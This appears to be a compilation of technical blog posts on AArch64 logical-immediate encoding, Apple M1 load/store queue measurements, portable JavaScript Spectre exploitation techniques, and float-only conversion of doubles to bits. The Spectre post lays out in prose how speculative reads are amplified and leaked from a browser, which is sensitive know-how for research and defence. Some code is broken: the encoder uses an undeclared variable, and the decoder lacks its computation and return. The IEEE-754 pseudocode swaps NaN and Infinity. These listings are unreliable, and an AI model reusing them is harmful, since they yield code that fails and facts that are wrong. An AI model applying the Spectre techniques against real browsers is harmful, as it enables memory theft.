# Bit-Twiddling: Optimising AArch64 Logical Immediate Encoding (and Decoding)

I came up with a (seemingly) new method to encode bitmask immediate values on ARM64. This really isn’t worth optimising – clarity and verifiability are more important – but it’s a fun bit-twiddling problem, and the solution I came up with is a bit shorter and ~30% faster than the best existing algorithms I could find (at least in my rough tests – value dependence may complicate things).

## Defining Logical Immediates

I found the description of logical immediate values in the specification very confusing, but with the help of Dominik Inführ’s post Encoding of Immediate Values on AArch64, and especially the linked list of all possible encodings, I was able to make sense of it, and come up with my own description that makes this algorithm a bit more evident.

I describe a logical immediate as a pattern of `o` ones preceded by `z` more-significant zeroes, repeated to fill a 64-bit integer. `o > 0`, `z > 0`, and the size (`o + z`) is a power of two in [2,64] (meaning the value has at least one zero-bit and one-bit, and repeats to fill the 64-bit integer without any truncation). This part of the pattern is encoded in the fields `imms` and `N`. Additionally, the field `immr` encodes a further right rotate of the repeated pattern. This allows a wide range of useful values to be represented, although notably not an all-zeroes or all-ones pattern.

(The specification describes this right-rotate as rotating the pattern of ones and zeroes before repetition. However, as it’s a repeating pattern, rotating the 64-bit value afterwards is equivalent, and a 64-bit rotate is usually available as a single instruction.)

## Encoding

At a high level, my method involves finding the rotation, doing the inverse of the rotation, to normalise the bit pattern, then finding the number of ones and size, and using knowledge of the size to check the pattern is repeating.

I first reject all-zero and all-one bit patterns, then remove the `immr` rotation. Prior to the rotation, a decoded value will have a one in the least-significant bit, and a zero in the most-significant bit. So I find a one adjacent to a less significant zero, and rotate the value such that that one is the least-significant bit.

There are a few different code sequences that can accomplish this, but I settled on clearing the trailing ones with `(x & (x+1))` and counting the trailing zeroes, then rotating the original value right by that amount. Note that this “trailing zeroes count” must be 0 or 64 for an all-zero value, as we may have cleared all the one bits.

This “normalized” value now has a one in the least significant bit, and a zero in the most significant bit, so we can count leading zeroes and trailing ones to determine `z` and `o` respectively. We’ve rejected all-zero and all-one values, so we can be sure that `1 <= z < 64` and `1 <= o < 64`, and the size `2 <= o + z <= 64`.

The final validation is to rotate the original value by the size `o + z`, and check that the result is still equal to the original value. This validates that we have a repeating pattern filling the 64-bit value (by effectively comparing each repetition of the pattern to the one next to it).

More confusingly, it also ensures that `o + z` is a power of two. The only minimal patterns that can repeat to fill a 64-bit value must have a length that is a factor of 64 (i.e. it is a power of two in the range [1,64]). By minimal patterns I mean patterns which do not themselves consist of a repeating pattern. For example, 010101 is a non-minimal pattern of a non-power-of-two length that can pass the rotation test. It consists of the minimal pattern 01. All our patterns are minimal, as they contain only one contiguous run of ones separated by at least one zero. (I’ll admit this is a little hand-wavy, but I did exhaustively verify it for 32-bit values.)

[Update: Pete Cawley offered the following explanation, which I’m much happier with:

(x rotate r) == x implies (x rotate gcd(r, bit width of x)) == x. In our case, r == o+z, and we know from construction of o and z that x rotated by less than o+z is not equal to x. Hence the gcd has to equal r, hence r divides bit width.

As someone with a hobbyist interest in maths, the correctness of the first statement wasn’t immediately apparent to me. Although there’s definitely some mathematical arguments I could try to make, and I’m sure others could offer me simple proofs all the way down to a level I’m comfortable with, I’m entirely satisfied that the equivalence of the two expressions is exhaustively verifiable in a relatively foolproof way by mapping out which bits are ensured to be equal to which other bits by `(x rotate r) == x` for each `r` from 0 to 63. [Update: Pete added As for why x == x rot r and x == x rot s implies x == x rot gcd(r, s): x == x rot r implies x == x rot (i * r) for any integer i (by induction). Extended gcd gives gcd(r, s) == i * r + j * s. Then x == (x rot (i * r)) rot (j * s) == x rot (i * r + j * s) == x rot gcd(r, s).]

The statement “x rotated by less than o+z is not equal to x” was intuitive to me, but for the sake of completeness: if we rotate right by one, the rotated ones (that we counted) will begin to overlap the zeroes (that we counted), ensuring `(x rotate 1) != x`. Rotating further, it’s not until the first one has been moved past the last zero (i.e. we have rotated by `o + z` places), that the counted zeroes and ones will not interfere with each other, and `(x rotate r) == x` may be true.]

Finally, we encode the values as per the specification, and we’re done.

So, here’s the code:

``````bool encodeLogicalImmediate64(uint64_t val, int *N, int *immr, int *imms)
{
if (val == 0 || ~val == 0)
return false;

int rotation = countTrailingZeros64(val & (val + 1));
uint64_t normalized = rotateRight64(val, rotation & 63);

int ones = nonzeroCountTrailingZeros64(~normalized);
int size = zeroes + ones;

if (rotateRight64(val, size & 63) != val)
return false;

*immr = -rotation & (size - 1);
*imms = (-(size << 1) | (ones - 1)) & 0x3f;
*N = (size >> 6);

return true;
}

bool encodeLogicalImmediate32(uint32_t val, int *N, int *immr, int *imms)
{
uint64_t val64 = ((uint64_t)val << 32) | val;
return encodeLogicalImmediate64(val64, N, immr, imms);
}``````

For comparison’s sake, see Linux’s implementation, Dolphin’s implementation, LLVM’s implementation, CoreCLR’s implementation and LuaJIT’s implementation (which performs best of those tested). Oh, and Chakra’s 100kb hash table implementation (which is similar to binutils’ implementation and HotSpot’s implementation, which build tables at runtime and encode with a binary search).

(There are a few variations worth considering. Depending on architecture, working from different ends of the bit-pattern may be cheaper. Early versions normalised the value by counting leading zeroes, shifting left by that amount, then counting leading ones, and then rotating the original value left by the sum of the amounts. Also, the current “count trailing ones” implementation is three instructions on ARM64 (RBIT + MVN + CLZ), but could be implemented with the RBIT + CLS (Count Leading Sign), as we know the number of trailing ones is greater than zero. [Update: I learned that that’s not how CLS works]. Let me know if you have suggestions for other tricks.)

## Decoding

Again, for decoders, a lot of implementations seem to closely follow the spec, which is probably wise – you can look at the spec and see that it does the right thing, and it’s hopefully not performance critical. But it’s another fun bit-twiddling problem, so here’s my best effort:

``````#define DECODE_FAILURE 0 // not a valid logical immediate

uint64_t decodeLogicalImmediate64(int N, int immr, int imms) {
static const uint64_t mask_lookup[] = {
0xffffffffffffffff, // size = 64
0x00000000ffffffff, // size = 32
0x0000ffff0000ffff, // size = 16
0x00ff00ff00ff00ff, // size = 8
0x0f0f0f0f0f0f0f0f, // size = 4
0x3333333333333333, // size = 2
};

int pattern = (N << 6) | (~imms & 0x3f);

if ((pattern & (pattern - 1)) == 0)
return DECODE_FAILURE;

int ones = (imms + 1) & (0x7fffffff >> leading_zeroes);
}

uint32_t decodeLogicalImmediate32(int N, int immr, int imms) {
if (N) return DECODE_FAILURE;
return (uint32_t)decodeLogicalImmediate64(N, immr, imms);
}``````

I couldn’t come up with a way to repeat values a variable number of times without a loop or a lookup, so I went with a lookup. I was originally thinking of using a multiply, but then I thought of the `mask ^ (mask << ones)` idea, which creates `ones` 1-bits in all the right places.

I didn’t benchmark this one, though I imagine it’s a bit faster than common techniques involving loops. I’m pretty happy with this, but I still wonder if I’m missing a good trick.

[Update: I was missing a good trick. Zach Wegner notedfor the decoding lookup table equation, you could use 128b unsigned division with (2^128-1) / (2^2^(6-n) + 1), but that’s a tad ridiculous…” (edited to remove an accidental +1). This is fantastic black magic, and I clearly need to learn more about division tricks for bit-twiddling. I’m pretty sure this remains impractical, but with a throughput of one 64-bit division every two cycles on the Apple M1 Firestorm, these kinds of tricks are more practical now than ever before. (If porting this trick to AArch64, without a 128-bit divider, I’d try 64-bit unsigned division, with a CNEG to handle the n=0 case.)

Update 2: To my surprise, it’s almost practical. The division is only ~2% slower than the table on Firestorm. On Coffee Lake, it’s ~3x slower than the table, but it’s still ~2x faster than LLVM’s implementation. Code is in this gist – I was way off with my initial idea about using CNEG, it ended up a bit simpler than that.]

## Final Notes

The code in this gist has been modified a little from the tested versions for presentation. The full version is available in a gist.

I hereby place the encoder and decoder code in the public domain, as per the terms of the CC0 license, although if you do use it, I’d love to hear about it. My Twitter is @dougallj.

# Apple M1: Load and Store Queue Measurements

Out-of-order processors have to keep track of multiple in-flight operations at once, and they use a variety of different buffers and queues to do so. I’ve been trying to characterise and measure some of these buffers in the Apple M1 processor’s Firestorm and Icestorm microarchitectures, by timing different instruction patterns.

I’ve measured the size of the load and store queue, discovered that load and store queue entries are allocated when the ops issue from the scheduler, and released once they are non-speculative and all earlier loads and stores have been released. I may have also accidentally found a trick for manipulating load/store alias prediction. And I figured I should write it up, so other people can reproduce it, and/or find mistakes.

The general idea is to time the execution of two independent long-latency operations (instructions, or chains of dependent instructions), with a number of loads or stores between them. Usually these two long-latency operations can run in parallel, but if there are so many loads/stores that some buffer is completely filled, the machine will stall, and will have to wait until space in the buffer is freed to execute subsequent instructions. This method was described first (and much more clearly) in Henry Wong’s blog post Measuring Reorder Buffer Capacity.

Initially, in measuring the M1, I used cache-missing loads as the “two independent long-latency operations” (as did everyone else, to my knowledge).

My result (which very roughly looked like AnandTech’s results) was that 128 loads or 107 stores could run, without stopping the final long-latency load from executing in parallel, but adding one more would cause a stall. Since the first load, 128 other loads, and the last load are in flight at the same time, I’d call this a load queue size of 130. I still believe this to be correct. On the other hand, the loads don’t require store buffers, so I incorrectly called this a 107 entry store queue.

## Schedulers and Dispatch Queues

Although it is not the topic of this post, I also mapped out the structure of the dispatch queues and schedulers:

If an op can enter a scheduler, it can leave the scheduler and execute when all its dependencies are ready. If it can enter a dispatch queue, then it will enter a scheduler when there’s room, and until then, the frontend can continue. But if the scheduler and dispatch queue are full, and we have an op that needs to go to that queue, we stall. This means no more ops can enter any dispatch queues until there is room in that queue.

It is worth noting that the load/store scheduler has 48 entries, with a 10 entry dispatch queue.

(Very briefly: These were measured by filling the scheduler with some number of loads or stores, with addresses depending on the first long-latency chain, then finding two points. First, I found the last point at which an independent load could still fit into the scheduler and run, to find the scheduler size. Then, I found the number of extra load/stores, once the scheduler was full, that were required to block independent floating-point operations. That gives the dispatch queue size. Mixing operations makes it possible to figure out which schedulers/queues are separate and which are not. Should I write this up?)

## Fighting Stores with Square-Roots

The next idea was to use a chain of long-latency floating point operations instead. Surprisingly, this produces a result that about 329 loads or stores can run between floating point operations, without forcing the two long-latency chains to run completely in parallel. I assume this means that load and store queue entries are being released, and reused, before the first long-latency chain has retired, and we’re hitting another limit. Mixing loads and stores confirms it’s the same limit. (It’s not the topic of this post, but I’ve explored it a bit and called it the “coalescing retire queue”. I believe it is their ROB implementation.)

So at this point I’m guessing that loads and stores can complete (free their load/store queue entries, but not their retire queue entries) once they are non-speculative. I believe this completion is in-order relative to other loads and stores. The approach I used to test this was to have a single, initial load or store operation, with its address depending on the result of the first long-latency operation.

However, for this writeup, I got the same result by instead adding a branch, dependent on the result of the first long-latency operation. This will ensure the loads and stores cannot become non-speculative, and keep their queue entries. In this test we see we can run 188 loads or 118 stores without forcing the two long-latency chains to run completely in parallel. This was initially pretty confusing, since we believe we only have a 130 entry load buffer. So, where did the extra 58 entries come from?

The load/store scheduler has 48 entries, with a 10 entry dispatch queue. If the load/store scheduler and dispatch queue are full, the integer and floating point units can continue operating. But if we hit one more load/store, the machine stalls, as it has nowhere to put the instruction. This explains the 58 extra entries.

By this logic (subtracting 58 for the size of the scheduler and dispatch queue), the store queue has only 60 entries. So why did we think it had 47 more? Because if the 48 entry scheduler is almost full, but has one free entry, then a load can enter the scheduler, and then issue from the scheduler and execute (in parallel with the other long-latency load), but if the scheduler is completely full, it cannot.

So those are my current numbers, 130 load queue entries and 60 store queue entries. The same logic works for Icestorm, where we see 30 load queue entries and 18 store queue entries (with an 18 entry scheduler and a 6 entry dispatch queue).

## An Uncomfortable, Surprising Discovery

In writing this up for this post, I tried to reproduce the “107 entry store queue” result, but the result I got was 60 entries. This is both the best answer I could hope for (it’s the number I currently think is correct), and the worst possible outcome (I’m writing this up, so that people can reproduce my work, and I’m failing to reproduce my own results).

So what went wrong? Bisecting a little, I found this was caused by refactoring to use X29 as the base address for the second long-latency load (with a variable offset), and using X29 or SP as the base address for the store (with a constant offset). Changing either or both registers back to X3 (even though the values did not change) gave me 107 again.

Processors try to execute loads and stores out of order, which makes things fast, as long as the data read by a load isn’t later changed by a preceding (in program order) store. This is called a memory order violation. When it happens, a processor typically throws away all its work and starts again, which is very expensive. (Apple provides a performance counter for this. It’s called MEMORY_ORDER_VIOLATION and described as “Incorrect speculation between store and dependent load”.) Because this is so expensive, there are predictors that try to figure out when a load and a store might alias, and run them in order instead. You can read more about how Intel approaches this in Travis Downs’ Memory Disambiguation on Skylake writeup.

X29 is typically used as the stack frame base pointer, and I suspect the memory dependency prediction has a special case for this, and makes the load wait until it knows the store doesn’t alias it. The theory is that if we have 60 speculative stores before the load, we can figure out all their addresses, and that the load can go ahead. But if we have 61, we can’t check the last one, so the load will wait.

The same code running on Icestorm also measures the 18 entry store buffer.

I think this explanation makes sense, but it was a surprising reminder that there’s still a lot of mysteries here, and it’d be good to verify it further. I put the code to reproduce this result in a gist if others want to investigate this.

## The Data

So, here’s the data. To get a single number, I find the top of the jump (the first point at which it’s executing completely serially) and subtract one. This is the largest number of instructions that execute a measurable amount faster than completely serially. But however you pick, the results are close enough.

(Note that the dependent B.cc is chained using FCMP, as I think FMOV might interfere with the memory operations.)

## Final Notes

The difference between measuring using the resource itself (loads+loads), and measuring using another resource (fsqrts+loads) is very clear in both graphs. The 58 instruction difference implies that when we do not have the resources to execute more loads, we can continue move more loads into the scheduler. So I conclude that the resources are allocated late. Similarly, the ~330 limit we can hit implies that this resource can be freed early.

I do not see this kind of pattern when measuring physical register file sizes (e.g. comparing int+int vs int+float), so I believe they are neither allocated late, nor freed early. But there’s a lot of complexity I do not yet understand.

# Another approach to portable Javascript Spectre exploitation

Many people, myself included, have held the belief that Spectre exploits need to know, understand, and manipulate microarchitectural details that are specific to a given processor design. Published Spectre PoCs generally use techniques such as cache analysis, and flushing lines from the cache. Although Stephen Röttger has shown such techniques can be portable between architectures and practical from Javascript using only coarse timing side-channels, such precise techniques are not necessary. This post describes the techniques I used in browser-based Spectre proof-of-concepts that should work on any sufficiently out-of-order processor, and that can be amplified to use arbitrarily coarse timers.

In trying to reproduce the results of the two-year-old V8 paper Spectre is here to stay, I used a very coarse model of caches and speculative execution. The theoretical model is as follows:

• CPUs have a cache, which must store any recently accessed memory, and is much smaller than main memory. Reading from the cache is faster than reading from main memory.
• CPUs have memory-level parallelism, i.e. two cache misses can be processed at the same time, if the address of both is known. (On the other hand, if the address of one cache-missing load depends on the result of another cache-missing load, the two will be processed one after the other.)
• If a memory read misses the cache, execution after the read will continue speculatively, with the branch predictor deciding which way branches that depend on the cache-missing value should go. Memory accesses during speculative execution may access and change which lines are in the cache (enabling the previously mentioned memory-level parallelism, as well as the cache side-channel to get information from a speculative context.)
• A sufficiently smart branch predictor may predict non-random patterns of branches, and a sufficiently smart pre-fetcher may pre-fetch non-random memory access patterns, but (pseudo) random branch and access patterns are sufficient to make both fail (the vast majority of the time).

This is all deliberately very general, so as to be basically true on all recent, high-performance CPUs.

Finally, I noted that a timing side-channel may experience random delays, the length of which can turn a fast result into a slow result. This is unavoidable, and depends on other system activity, so error detection and correction is required. The probabilistic techniques I use can lead to false positives and false negatives, but as long as these are reasonably improbable, error-correction allows us to turn this into a performance problem rather than a correctness problem.

The two main techniques here were based on, and inspired by, a 2013 blog post by Henry Wong, Measuring Reorder Buffer Capacity.

## Pigeonhole Eviction

This idea is as self-evident as the pigeonhole principle, but nonetheless it took me a while to internalise, and to think of applying it to Spectre.

If you have N cache-lines of data, and a cache that can hold only M lines, and N > M, then some of your data (at least N-M lines) must have been evicted from the cache.

For example, consider a CPU with a 256 KB L2 cache. By allocating 64MB of data, there is at most a 0.4% (1/256) chance that a randomly chosen cache-line will be in the L2 cache, and a much smaller chance it’ll be in the (smaller) L1 cache.

This is an adequate eviction “technique” for Spectre. I never evict a chosen line, but instead choose a new location at random that is very likely to have already been evicted. (And at any time a line can be moved into the L1 cache by reading or writing that cache line.)

## MLP Amplification

Consider the following loop, which follows a pointer-chain. If `p` always points to a random cache-line within an uncacheably-large buffer, it will run at approximately one cache-miss per iteration.

`````` loop {
p = buffer[p]
}``````

Now, supposing I add another cache-miss, where `buffer[p+1]` also points to a random cache-line:

`````` loop {
p = buffer[p]
sum += buffer[buffer[p+1]]
}``````

This will still run at at approximately one cache-miss per iteration, because the two cache-misses don’t depend on each other and can take advantage of memory-level parallelism.

Next, imagine that `buffer[p+1]` doesn’t point to a random location, but instead points to a location a few steps ahead on the pointer-chain. I’ll call this a prefetching load. Each step to a random location will cost approximately one cache-miss, but on any iteration where the line has been fetched into the cache already, there won’t be a cache miss, so the average will be less than one cache-miss per iteration. These two different iteration speeds, depending on a value, are the basis of the side-channel.

The trick is then to make the prefetching load speculative. A bit that you want to leak from speculative execution can be multiplied by a large number and added to `buffer[p+1]`, and the speed of the loop will now be decided by the value of the bit.

This is done by making the loop mispredict an internal branch (e.g. a bounds check) every few (e.g. five to fifteen) iterations, read some an integer it shouldn’t, extract a bit, and, if that value is zero, preload the upcoming links in the pointer chain. Memory level parallelism is typically much wider than two, so my PoC uses five prefetching loads which can significantly shorten the non-triggering iterations.

With this technique, amplification is arbitrary, and controlled by the number of iterations of the loop. However, the strength of the signal may vary depending on the microarchitecture.

The code for this is complicated by the need to run a random number of branch-predictor-training iterations between every speculative read (as the branch may predict correctly if the number is non-random). This also has the limitation that speculative reads that only work with low-probability have a much weaker signal, which may not be distinguishable from noise (i.e. this technique doesn’t allow the speculative read operation to be timed independently of the cache access operation.)

For timing, the simplest portable technique I found was to leak each bit followed by the inverse of that bit, and compare the two times. This halves the speed of the leak, doesn’t correct for all errors, and isn’t usually strictly necessary, but it does allows leaking at low signal strengths, where dynamic CPU clock frequencies might shift one value to start looking like the other during the run. There’s a lot of room for improvement, but it’s a nice way to skip implementing a calibration phase if you’re lazy.

(Note that amplification is not necessary on browsers with SharedArrayBuffer enabled.)

My initial efforts used an `Array` out-of-bounds, storing a cache-missing new length to an array, so as to delay resolution of the bounds-check. The Javascript code worked to read out-of-bounds on different CPUs, and on both Chrome and Safari (although the different `Array` representations in Chrome and Safari made the out-of-bounds read almost useless in Safari). But this was relatively slow, as the store forwarding of the length would sometimes stall speculative execution (or at least that’s my best guess), lowering the signal strength.

Type-confusion (map check bypass) techniques seem to be the most practical avenue. The variants I used are specific to a browser, but it’s essentially a “choose your own type confusion”, using traditional Javascript exploitation techniques, first reading out-of-bounds, then using that information to set up the data for a fake object that allows an arbitrary read.

Very roughly, I create an object which stores its type field a couple of cache-lines away from a target-field. I create a lot of adjacent objects, of a smaller, different type. Two smaller objects will be interpreted as the larger object’s type and target-field, respectively. I rely on pigeonhole eviction to get a randomly chosen target pair that are uncached, then access the target-field-containing smaller object to ensure it’s in the cache. After this, resolution of the speculative type-check will be delayed, and branch-prediction will assume it passes. However, the speculative read of the target-field will not be delayed. This general idea works on both Chrome and Safari, although the details differ. There are fallible steps here, but speculatively reading unmapped memory won’t crash, error-correction can handle rare flipped bits, and amplification automatically takes an average of a large number of attempts.

Last I checked, Firefox tries not to speculate past type-checks (on JS objects), as well as bounds-checks on arrays, but does not mitigate against variant 4 attacks. I was initially rather sceptical of the practicality of variant 4 attacks described in the V8 paper. Specifically, it’s easy to get a `mov [rax], rbx ; mov rcx, [rdx]` to use a stale value from memory (where `rax == rdx`, but the value of `rdx` is available first), but it’s not immediately clear how this can be exploited. It’s much harder to get the more common `mov [rsp+0x8], rbx ; mov rcx, [rsp+0x8]` to use stale memory. (This, for example, is a pattern Firefox can generate with one instruction in-between, when spilling a value to the stack, which would be rather exploitable). However, in a standalone harness I found that a Coffee Lake processor could do this with >30% reliability depending on the preceding instructions. This appeared to be under a complex set of microarchitectural conditions, which aren’t particularly hard to hit occasionally, but are very tricky to get the processor to repeatably hit with high probability. I agree with their conclusion that this is a real threat, and essentially unable to be mitigated, although I got distracted trying to understand the microarchitectural state, and didn’t try to write a proof-of-concept.

## Coding for Side-Channels

Spectre allows us to get data by asking short, stateless questions, and getting a yes-or-no answer back over a possibly-unreliable channel. This is a similar situation to other blind injection vulnerabilities (such as SQLi). But what are the best questions to ask? This is an interesting mathematical problem, closely related to coding theory.

Some coding theory solutions can be applied directly. For example, dynamic Huffman coding can be used to compress the data (and get a result with fewer questions), which I’ve done for blind SQL injection, and should apply here too. Similarly, Hamming codes and repetition codes can be used for error detection and correction, which I tried for Spectre. However, these solutions are unlikely to be optimal, as the reliable and flexible one-way question channel is an unusual advantage.

In my standalone experiments, one of the best (and simplest) reliability techniques I’ve found is “ask and verify” (which I first saw in sqlmap). The idea is that, after leaking a word of the message bit-by-bit, we then ask if the word is equal to what we leaked, and if not, we retry. Less reliable channels benefit from repeating the verification a number of times, and also asking for its inverse (so as to detect “always yes” or “always no” burst noise conditions). They also benefit from smaller chunk sizes. More reliable channels can decrease overhead by asking the verifying question for larger chunks of the message. There’s some fun maths here, but I haven’t taken the time to explore it. Maybe it’s already been written about somewhere?

## Final Notes

I don’t know if any of this work is novel. I tried to reproduce the results in the two-year-old V8 paper Spectre is here to stay, where they described proof-of-concepts like this. They left out the proof-of-concepts and specific techniques, presumably because they felt that publishing them would do more harm than good. I filled in the gaps, so maybe my solutions are the same. Maybe they aren’t. It feels kinda weird to use an old paper by the V8 developers to write a V8 exploit that works today, but I guess that’s the post-Spectre world.

Similarly, the recent publication of A Spectre proof-of-concept for a Spectre-proof web by Stephen Röttger and Artur Janc on the Google Security blog would be have been unimaginable a few years ago (as their PoC not only bypasses ASLR but allows the contents of memory to be read from Javascript in the latest Chrome). Their work is much more impressive than mine, with techniques that allow exploitation in much less flexible situations, and are also quite portable (given the prevalence of L1 Tree-PLRU caches). I hope to experiment with some of their techniques in the future.

They state “we don’t believe this particular PoC can be re-used for nefarious purposes without significant modifications”. I don’t plan to publish my proof-of-concepts, but I hope the result that arbitrarily-amplifiable Spectre PoCs needn’t be specific to a cache-design, microarchitecture, architecture, or technically even browser is useful to understanding this uniquely persistent vulnerability.

# Bitwise conversion of doubles using only floating-point multiplication and addition

(Unfortunately, this is best viewed on non-mobile. I’ll get off WordPress soon.)

In the words of Tom Lehrer, “this is completely pointless, but may prove useful to some of you some day, perhaps in a somewhat bizarre set of circumstances.”

The problem is as follows: suppose you’re working in a programming environment that provides only an IEEE-754 double-precision floating point (“double”) type, and no operations that can access that type’s representation (such as C++ bitwise cast operations, or Javascript’s DataView object). You have a double and you want to convert it to its bitwise representation as two unsigned 32-bit integers (stored as doubles), or vice versa. This problem comes up from time to time, but I was curious about a different question: how restricted can your programming environment be? Could you do it with just floating point multiplication and addition?

Bitwise conversion using floating point operations can be useful in situations like limited interpreted languages, or C++ constexpr contexts. Generally double to int conversion can be done using a binary search, comparing with powers of two to figure out the bits of the exponent. From there the fraction bits can be extracted, either by binary searching more, or using the knowledge of the exponent to scale the fraction bits into the integer range.

But can it be done without bitwise operations, branches, exponentiation, division, or floating point comparisons?

It seemed improbable at first, but I’ve discovered the answer is yes, multiplication and addition are mostly sufficient, although with a few notable caveats. Even without these restrictions different NaN values cannot be distinguished or generated (without bitwise conversion) in most environments, but using only multiplication and addition it is impossible to convert NaN, Infinity or -Infinity into an unsigned 32-bit value. The other problematic value is “negative zero”, which cannot be differentiated from “positive zero” using addition and multiplication. All my code uses subtraction, although it could be removed by substituting `a - b` with `a + (b * -1)`. And finally, this relies on IEEE-754 operations (in the usual rounding mode, “round to nearest, ties to even”), so it wouldn’t work in environments that use unsafe maths optimisations (the default in shader compilers, or enabled by a flag such as /fp:fast in many other compilers).

So, if you just need a solution, here it is, but otherwise stick around for an explanation:

```function double_as_uint32s(double) {
// Doesn't handle NaN, Infinity or -Infinity. Treats -0 as 0.

var a = double, b, c, d, e, f, g, h, i, j, k, l, m, n, low, high;

f=2.2250738585072014e-308+a; j=5e-324; b=j+f; b-=f; m=-5e-324; d=m+b; b=4.4989137945431964e+161; d=b*d; d=b*d; g=d*d;
d=1.0; g=d-g; h=m+f; f=h-f; f=j+f; f=b*f; f=b*f; f*=f; f=d-f; f*=g; g=-2.2250738585072014e-308+a; h=j+g; h-=g; h=m+h;
h=b*h; h=b*h; h*=h; h=d-h; c=m+g; c-=g; c=j+c; c=b*c; c=b*c; c*=c; c=d-c; c*=h; k=c*f; c=5.562684646268003e-309*a;
g=j+c; g-=c; g=m+g; g=b*g; g=b*g; g*=g; g=d-g; h=m+c; h-=c; h=j+h; h=b*h; h=b*h; h*=h; h=d-h; g=h*g; h=a*g; g=d-g;
c=g*c; g=1024.0*g; f=2.0+g; c+=h; h=7.458340731200207e-155*c; l=1.0000000000000002; g=l*h; g=m+g; e=j+g; e-=g; e=b*e;
e=b*e; c=e*c; e=d-e; g=e*h; c=g+c; e=512.0*e; g=8.636168555094445e-78*c; e+=f; f=l*g; f=m+f; h=j+f; f=h-f; f=b*f;
f=b*f; c=f*c; f=d-f; g=f*g; f=256.0*f; c=g+c; e=f+e; f=2.938735877055719e-39*c; g=l*f; g=m+g; h=j+g; g=h-g; g=b*g;
g=b*g; c=g*c; g=d-g; f=g*f; c=f+c; f=128.0*g; g=5.421010862427522e-20*c; e=f+e; f=l*g; f=m+f; h=j+f; f=h-f; f=b*f;
f=b*f; c=f*c; f=d-f; g=f*g; f=64.0*f; c=g+c; e=f+e; i=2.3283064365386963e-10; f=i*c; g=l*f; g=m+g; h=j+g; g=h-g; g=b*g;
g=b*g; c=g*c; g=d-g; f=g*f; c=f+c; f=32.0*g; g=1.52587890625e-05*c; e=f+e; f=l*g; f=m+f; h=j+f; f=h-f; f=b*f; f=b*f;
c=f*c; f=d-f; g=f*g; f=16.0*f; c=g+c; e=f+e; f=0.00390625*c; g=l*f; g=m+g; h=j+g; g=h-g; g=b*g; g=b*g; c=g*c; g=d-g;
f=g*f; c=f+c; f=8.0*g; g=0.0625*c; e=f+e; f=l*g; f=m+f; h=j+f; f=h-f; f=b*f; f=b*f; c=f*c; f=d-f; g=f*g; f=4.0*f;
c=g+c; e=f+e; f=0.25*c; g=l*f; g=m+g; h=j+g; g=h-g; g=b*g; g=b*g; c=g*c; g=d-g; f=g*f; c=f+c; f=g+g; e=f+e; n=0.5;
f=n*c; g=l*f; g=m+g; h=j+g; g=h-g; g=b*g; g=b*g; c=g*c; g=d-g; f=g*f; c=f+c; e=g+e; f=d-k; g=j+a; g-=a; g=m+g; g=b*g;
g=b*g; g*=g; g=d-g; h=m+a; a=h-a; a=j+a; a=b*a; a=b*a; a*=a; a=d-a; a*=g; g=f*a; a=d-a; a=e*a; a+=g; e=l*c; e=m+e;
g=j+e; e=g-e; e=b*e; e=b*e; g=n*c; c=e*c; e=d-e; e*=g; c=e+c; e=4.450147717014403e-308+c; g=j+e; g-=e; g=m+g; g=b*g;
g=b*g; g*=g; g=d-g; h=m+e; e=h-e; e=j+e; e=b*e; e=b*e; e*=e; e=d-e; e*=g; g=e+e; d-=g; c=d*c; c=b*c; b*=c;
c=-4503599627370496.0*f; c+=b; b=i*c; b=-0.4999999998835847+b; b=4503599627370497.0+b; d=-4503599627370497.0+b;
b=2147483648.0*e; a=1048576.0*a; a=b+a; b=d+a; a=-4294967296.0*d; a+=c; low=a; high=b;

return [low, high];
}

function uint32s_as_double(low, high) {
var a = low, b = high, c, d, e, f, g, h, i, j, k, l, m;

b=9.5367431640625e-07*b; f=-0.4999999998835847; c=f+b; g=4503599627370497.0; c=g+c; e=-4503599627370497.0; c=e+c;
d=b-c; c=0.00048828125*c; b=f+c; b=g+b; k=e+b; l=c-k; j=2.2250738585072014e-308; c=j+l; c-=l; i=4.49423283715579e+307;
b=i*c; c=1.0; b=c-b; a=2.220446049250313e-16*a; h=-0.00048828125+l; a=d+a; d=b*h; d+=d; h=f+d; h=g+h; h=e+h; d-=h;
b+=a; b=j*b; m=1.3407807929942597e+154; h=m*h; h=c+h; b=h*b; b*=h; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=m*h; h=c+h;
b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=1.157920892373162e+77*h; h=c+h; b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h;
h=3.402823669209385e+38*h; h=c+h; b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=1.8446744073709552e+19*h; h=c+h; b=h*b;
d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=4294967295.0*h; h=c+h; b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=65535.0*h; h=c+h;
b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=255.0*h; h=c+h; b=h*b; d+=d; h=f+d; h=g+h; h=e+h; d-=h; h=15.0*h; h=c+h;
b=h*b; d+=d; f+=d; f=g+f; e+=f; d-=e; e=3.0*e; e=c+e; b=e*b; d+=d; d=c+d; b=d*b; d=-0.99951171875+l; e=j+d; d=e-d;
d=i*d; e=j+a; a=e-a; a=i*a; a=c-a; a=d*a; a=m*a; a=m*a; a-=a; a=b+a; b=k+k; b=c-b; a*=b;

return a;
}
```

(I’m mostly joking, but it would be pretty funny to find that code buried in a library someday, and it should be pretty easy to port to just about any language.)

## Background: IEEE-754 Doubles

This aims to be a concise explanation of everything you need to know about doubles to understand the rest of the article. Skip it if you know it already.

A double is a 64-bit value. Going from most-significant-bit to least-significant-bit, it is comprised of a 1-bit `sign`, an 11-bit `exponent` and a 52-bit `fraction`. These bits are interpreted as either a special value, or a numerical value as described in the following pseudocode. The operations and values in the pseudocode have infinite precision, and `**` is the exponentiation operation.

```if (sign == 1)
s = -1;
else
s = 1;

if (exponent == 0x7FF) {
// Maximum exponent means a special value
if (fraction == 0)
return NaN;       // Not a Number
else if (sign == 1)
return -Infinity;
else
return Infinity;
} else if (exponent == 0) {
// Zero exponent means a subnormal value.
return s * (0.0 + fraction * (2 ** -52)) * (2 ** -1022);
} else {
// Everything else is a normal value.
return s * (1.0 + fraction * (2 ** -52)) * (2 ** (exponent-1023));
}
```

Normal values have an implicit leading 1, and can be thought of as “1.fraction”. Subnormals do not, so can be thought of as “0.fraction”, but they are otherwise the same as `exponent` == 1.

This has been carefully designed, and gives a few interesting properties:

• The implicit leading one ensures that each value has a unique representation (except for 0/-0 and NaN).
